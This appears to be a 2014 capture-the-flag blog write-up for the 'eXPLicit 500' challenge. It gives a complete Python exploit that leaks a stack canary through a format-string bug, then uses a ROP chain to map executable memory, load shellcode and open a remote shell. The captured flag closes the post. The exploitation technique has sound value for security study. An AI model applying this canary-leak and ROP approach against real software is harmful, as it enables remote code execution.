Vulnerabilities

Thursday, September 18, 2014

No cON Name CTF Quals 2014 - eXPLicit 500 - [Team SegFault]

We got a statically linked linux 32-bit ELF with NX and stack canary. It had 2 vulnerabilities - format string and buffer overflow, which are easy to find. The idea of the exploit is below:

[*] Leak stack canary using format string vulnerability
[*] Overwrite saved EIP using buffer overflow and call mmap() to allocate memory with RWX permission
[*] Copy shellcode to newly allocated memory using read()
[*] Jump to the shellcode

Since the executable is statically linked we cannot make libc calls, but there is plenty of gadgets to make syscalls.

Here is the full exploit:
#!/usr/bin/env python

import re
import sys
import time
import struct
import telnetlib
import shellcode

ip = "127.0.0.1"
ip = "88.87.208.163"
port = 7070

con = telnetlib.Telnet(ip, port)
QUIT = "q"

# leak canary using format string vuln
con.write("%90$08x\n")
time.sleep(1)
t = con.read_very_eager()
match = re.search("[a-f\d]{8}", t)
if match: canary = struct.pack("<I", int(match.group(),16))
else: sys.exit(0)

# overflow buffer
payload  = QUIT
payload += "A" * 255
payload += canary
payload += "A" * 12

# Setup for mmap()
payload += struct.pack("<I", 0x080bee58) # pop eax ; ret
payload += struct.pack("<I", 7)
payload += struct.pack("<I", 0x0809df7c) # xchg eax, edx ; ret
payload += struct.pack("<I", 0x080499f5) # pop esi ; ret
payload += struct.pack("<I", 0x080d6080) # bss address
payload += struct.pack("<I", 0x080cf0a2) # pop ecx ; or cl, byte [esi] ; or al, 0x43 ; ret
payload += struct.pack("<I", 1024)
payload += struct.pack("<I", 0x0808e0dc) # pop eax ; pop ebx ; pop ebp ; pop esi ; pop edi ; ret
payload += struct.pack("<I", 0xc0)
payload += struct.pack("<I", 0x0badc000)
payload += struct.pack("<I", 0x0)
payload += struct.pack("<I", 34)
payload += struct.pack("<I", 0x0)
payload += struct.pack("<I", 0x08061240) # int 0x80 ; ret

# Setup for read()
payload += struct.pack("<I", 0x080bee58) # pop eax ; ret
payload += struct.pack("<I", 1024)
payload += struct.pack("<I", 0x0809df7c) # xchg eax, edx ; ret
payload += struct.pack("<I", 0x080499f5) # pop esi ; ret
payload += struct.pack("<I", 0x080d6080) # bss address
payload += struct.pack("<I", 0x080cf0a2) # pop ecx ; or cl, byte [esi] ; or al, 0x43 ; ret
payload += struct.pack("<I", 0x0badc000)
payload += struct.pack("<I", 0x080bee58) # pop eax ; ret
payload += struct.pack("<I", 0x3)
payload += struct.pack("<I", 0x08048139) # pop ebx ; ret
payload += struct.pack("<I", 0x4)
payload += struct.pack("<I", 0x08061240) # int 0x80 ; ret

# Jump to shellcode
payload += struct.pack("<I", 0x0badc000)

con.write(payload + "\n")
con.read_until("Bye\n")
con.write(shellcode.DUP2 + shellcode.EXECVE + "\n")
print "[*] Got shell"
con.interact()
Flag for the challenge is NcN_97740ead1060892a253be8ca33c6364a712b21d2

No comments:

Post a Comment